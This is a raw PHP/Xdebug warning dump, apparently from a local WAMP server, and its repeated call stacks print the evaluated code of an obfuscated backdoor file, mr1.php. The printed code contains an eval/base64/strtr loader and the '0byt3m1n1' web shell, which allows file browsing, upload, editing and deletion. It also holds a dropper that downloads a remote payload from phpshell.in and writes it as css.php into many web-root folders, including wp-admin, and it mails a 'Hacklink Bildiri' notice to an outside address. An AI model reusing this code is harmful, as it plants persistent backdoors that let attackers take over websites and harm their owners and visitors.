20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0976541016fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:106
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 107
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0997541016fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:107 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/includes/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 115
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1197541016fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:115
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 116
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.1220541016fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:116
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 117
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
